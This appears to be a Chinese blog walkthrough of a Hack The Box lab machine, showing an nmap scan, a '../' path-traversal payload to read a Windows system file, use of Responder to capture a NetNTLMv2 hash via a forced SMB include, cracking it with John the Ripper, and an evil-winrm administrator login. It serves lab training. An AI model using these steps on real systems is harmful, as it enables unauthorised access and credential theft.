hack the box(5985 WinRM)

最新推荐文章于 2024-05-20 16:40:58 发布
最新推荐文章于 2024-05-20 16:40:58 发布
阅读量1.8k 收藏 1
点赞数
分类专栏: 计算机网络 文章标签: linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56010012/article/details/124253053
版权

nmap参数定义

-v:增加详细级别(基本上输出更多信息)-p-:此标志扫描0-65535范围内的所有TCP端口-sV:尝试确定端口上运行的服务版本-sC:使用默认NSE脚本扫描--min-rate:这用于指定Nmap每秒应发送的最小数据包数;数字越高,扫描速度越快

nmap -v -p- --min-rate 5000 -sV -sC 10.129.136.91

 根据Nmap扫描的结果,机器使用Windows作为操作系统,在端口80上运行Apache Web服务器,在端口5985上运行WinRM。7680端口上运行的服务标识为pando pub,这是一种文件传输服务。


 

当访问http://{target_IP}/时,网站重定向为unika.htb。

基于名称的虚拟托管是一种在单个服务器上托管多个域名(每个域名分别处理)的方法。这允许一台服务器共享其资源,例如内存和处理器周期,而不需要相同主机名使用所有服务。web服务器检查HTTP请求的主机头字段中提供的域名,并根据该域名发送响应。/etc/hosts文件用于将主机名解析为IP地址,因此我们需要在该域的/etc/hosts文件中添加一个条目,以使浏览器能够解析unika的地址。

echo "10.129.136.91 unika.htb" | sudo tee -a /etc/hosts

文件包含漏洞

动态网站包括动态的HTML页面,使用来自HTTP请求的信息包括GET和POST参数、cookie和其他变量。一个页面通常会根据其中一些参数“include”另一个页面。

LFI或本地文件包含是指攻击者能够让网站包含一个本不打算作为此应用程序选项的文件。一个常见的例子是,应用程序使用文件的路径作为输入。如果应用程序将此输入视为受信任的,并且未对此输入执行所需的检查,则攻击者可以使用 ../ 输入文件名并最终在本地文件系统中查看敏感文件。在某些有限的情况下,LFI也会导致代码执行。

RFI或远程文件包含类似于LFI,但在这种情况下,攻击者可以使用HTTP、FTP等协议在主机上加载远程文件。

http://unika.htb/index.php?
page=../../../../../../../../windows/system32/drivers/etc/hosts

Responder

工作流程

Responder程序可以执行多种不同类型的攻击,但在这种情况下,它将设置恶意SMB服务器。
当目标计算机尝试对该服务器执行NTLM身份验证时,Responder会向服务器发送一个challenge,要求服务器使用用户的密码进行加密。当服务器响应时,Responder将使用质询和加密响应生成NetNTLMv2。虽然我们无法逆转NetNTLMv2,但我们可以尝试使用许多不同的常用密码,看看是否有任何密码会生成相同的challenge响应,如果找到一个,我们就知道这就是密码。这通常被称为散列破解,我们将使用一个名为John The Ripper的程序来实现。

使用Responder之前需要查看Responder.conf配置文件,SMB的服务是否开启。

 配置文件就绪后,我们可以继续使用python3启动响应程序,通过-I标志传入接口以监听:

python Responder.py -I tun0

 在响应服务器就绪的情况下,我们通过web浏览器按如下方式设置页面参数,告诉服务器包含来自SMB服务器的资源。

http://unika.htb/?page=/10.10.14.7/somefile  #服务器端访问

监听得到

 将得到的hash值保存为hash.txt文件。

散列破解

将上述的hash值保存为hash.txt

我们将散列文件传递给john,并破解管理员帐户的密码。散列类型由john命令行工具自动识别:

-w : wordlist to use for cracking the hash

john -w=/usr/share/wordlists/rockyou.txt hash.txt

 得出关键信息:password:badminton

WinRM

Windows Remote Management或WinRM是Windows本机内置的远程管理协议,基本上使用简单的对象访问协议与远程计算机和服务器以及操作系统和应用程序进行交互。WinRM允许用户:

→ 与主机进行远程通信和接口

→ 在非本地但可通过网络访问的系统上远程执行命令。
→ 从远程位置监视、管理和配置服务器、操作系统和客户机。
作为pentester,这意味着如果我们能找到具有远程管理权限的用户的凭据(通常是用户名和密码),我们就有可能在主机上获得PowerShell外壳。

利用evil-winrm远程连接:

evil-winrm -i 10.129.136.91 -u administrator -p badminton

BRAVE_YAYA
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
modernie-winrm:此Vagrantfile能够在Microsoft分发的盒子上自动配置WinRM
02-06
现代主义这个Vagrantfile能够在分发的机器上自动配置WinRM。 换句话说,这个Vagrantfile能够: 禁用防火墙(Microsoft分发的框默认配置为启用防火墙); 将网络位置类型更改为“工作网络”(默认情况下,Microsoft...
Hack The Box-Mailing
m0_52742680的博客
05-06 1836
HackTheBox S5赛季靶场第三篇
内网横向下的135,445与5985端口
qq_31812157的博客
03-11 416
WMIC是Windows 管理仪表命令行(Windows Management InstrumentationCommand-line)的简称,它是一款命令行管理工具,使用WMIC,我们不但可以管理本地计算机,还可以管理统一局域网内的所有远程计算机(需要必要的权限),而被管理的计算机不必事先安装WMIC。自Windows98开始,Windows 操作系统都支持WMICWMIC是一系列工具集组成的。
Hack The Box-Jab
m0_52742680的博客
02-26 1652
HackTheBox季节性靶场第八篇
Hack The Box——Sauna
江左盟的博客
05-27 3546
简介 信息收集 使用nmap --min-rate 10000 -T5 -A -p1-65535 10.10.10.175扫描端口及服务发现开启的端口非常的多,如图: 查看web服务各功能及源代码,未发现获得Shell的漏洞,网站时静态的,通过W3layouts生成,如图: 扫描网站目录也未发现有价值的线索,如图: 然后看到389端口和3268端口都运行着ldap服...
Hack The Box-Office
m0_52742680的博客
02-18 2569
HackTheBox季节性靶场第七篇
pywinrmWindows远程管理(WinRM)的Python库
02-28
pywinrm pywinrmWindows远程管理(WinRM)服务的Python客户端。 它允许您从任何可以运行Python的计算机上在目标Windows计算机上调用命令。 WinRM允许您远程执行各种管理任务。 这些包括但不限于:运行批处理脚本,...
winrm
03-13
winrm
WinRM-Scripts:WinRM脚本
04-02
WinRM脚本WinRM脚本
PowerShell启用winrm失败:拒绝访问 0x80070005 -2147024891
09-21
主要介绍了PowerShell启用winrm失败:拒绝访问 0x80070005 -2147024891,本文给出了详细的排查步骤和解决方法,需要的朋友可以参考下
Linux知识点笔记
exercise_smile的博客
05-16 897
Linux 主要的发行版(release):Ubuntu(乌班图)、 RedHat(红帽)、 CentOS、 Debain[蝶变]、 Fedora、 SuSE、 OpenSUSE [示意图]在 linux 中的每个用户必须属于一个组, 不能独立于组外。在 linux 中每个文件 有所有者、 所在组、 其它组的概念。ls -l 中显示的内容如下:0-9 位说明:第 0 位确定文件类型(d, - , l , c , b)l 是链接, 相当于 windows 的快捷方式。
Linux “如何添加用户/组和修改用户/组”
最新发布
y2162484776的博客
05-20 367
我们首先要知道Linux中用户时必须的吗!???用户是标识计算机的资源归属的。
Linux 三十六章
一怀明月的博客
05-17 986
信号量 sem_init sem_destroy sem_wait sem_post 基于环形队列的CP问题 环形队列的生产者消费者模型 线程池 localtime时间戳转化 mkdir系统调用 bind绑定成员函数 懒汉饿汉单例模式 懒汉模式: 饿汉模式: 懒汉和饿汉相同点: 线程池源码实现
linuxlinux中免交互命令expect原理与应用实战
景天科技苑
05-20 1436
Expect 是基于 Tcl 的相对简单的一个免费的脚本编程工具语言,用来实现 自动和交互式任务程序进行通信,无需人的手工干预。比如 SSH、FTP 等,这些 程序正常情况都需要手工与它们进行交互,而使用 Expect 就可以模拟人手工交 互的过程,实现自动的和远程的程序交互,从而达到自动化运维的目的。
操作系统 实验13 批处理操作接口3:引用与命令替换
m0_63093530的博客
05-14 155
结果:第一个和第三个命令是错的,第二个和第四个命令是对的。echo "这是命令替换形式1...$date1"echo "$sv ++++加上另一些字符!2、输出字符串“China's panda”命令:echo China\'s panda。6、将命令date执行结果赋予变量date1。7、将命令date执行结果赋予变量date2。1、输出字符串“$Dollar”命令:echo \$Dollar。命令:date2=$(date)命令:date1=`date`
Linux:网络管理命令之ss
hhd1988的专栏
05-17 814
Linux:网络管理命令之ss
Linux的基础指令
asdssadddd的博客
05-14 946
常用选项:-f 或 --force 强行复制文件或目录, 不论目的文件或目录是否已经存在.-i 或 --interactive覆盖文件之前先询问用户.-r递归处理, 将指定目录下的文件与子目录一并处理. 若源文件或目录的形态, 不属于目录或符号链接, 则一律视为普通文件处理.-R 递归处理, 将指定目录下的文件及子目录一并处理.
Linux - 整理工作中常用的 Linux 命令(目录、文件、系统、进程、网络)持续更新~
CYK_byte的博客
05-16 956
整理了一下工作中常用的 Linux 命令(目录、文件、系统、进程、网络)
winrm 拒绝访问
10-09
WinRMWindows 远程管理)是一种用于远程管理 Windows 操作系统的协议和技术。当在尝试远程访问时,可能会遇到“WinRM 拒绝访问”的错误。 这个错误通常是由于以下原因之一导致的: 1. 防火墙设置: 防火墙可能会阻止 WinRM 的连接。要解决此问题,需要确保在防火墙的入站规则中允许通过 WinRM 的流量。 2. WinRM 服务未启动:如果 WinRM 服务未启动,则无法进行远程连接。可以通过在服务管理器中手动启动 WinRM 服务或运行以下命令来确保该服务正在运行:`net start WinRM`。 3. 用户权限限制:如果当前用户不具有足够的权限进行远程连接,也会导致“WinRM 拒绝访问”的错误。在此情况下,可以尝试使用具有管理员权限的用户登录或添加当前用户到具有远程访问权限的组。 4. 网络配置问题:如果网络配置不正确,也可能导致该错误。此时,需要检查网络设置和连接,确保可以与远程计算机建立连接。 5. SSL 配置问题:如果使用加密方式连接远程计算机,并且 SSL 配置不正确,也可能导致“WinRM 拒绝访问”的错误。在此情况下,需要检查 SSL 证书和配置,确保其正确并与远程计算机匹配。 总之,要解决“WinRM 拒绝访问”的错误,需要确保防火墙设置正确、WinRM 服务已启动、用户具有足够的权限、网络配置正确且 SSL 配置正确。这样,就可以成功远程访问 Windows 操作系统了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值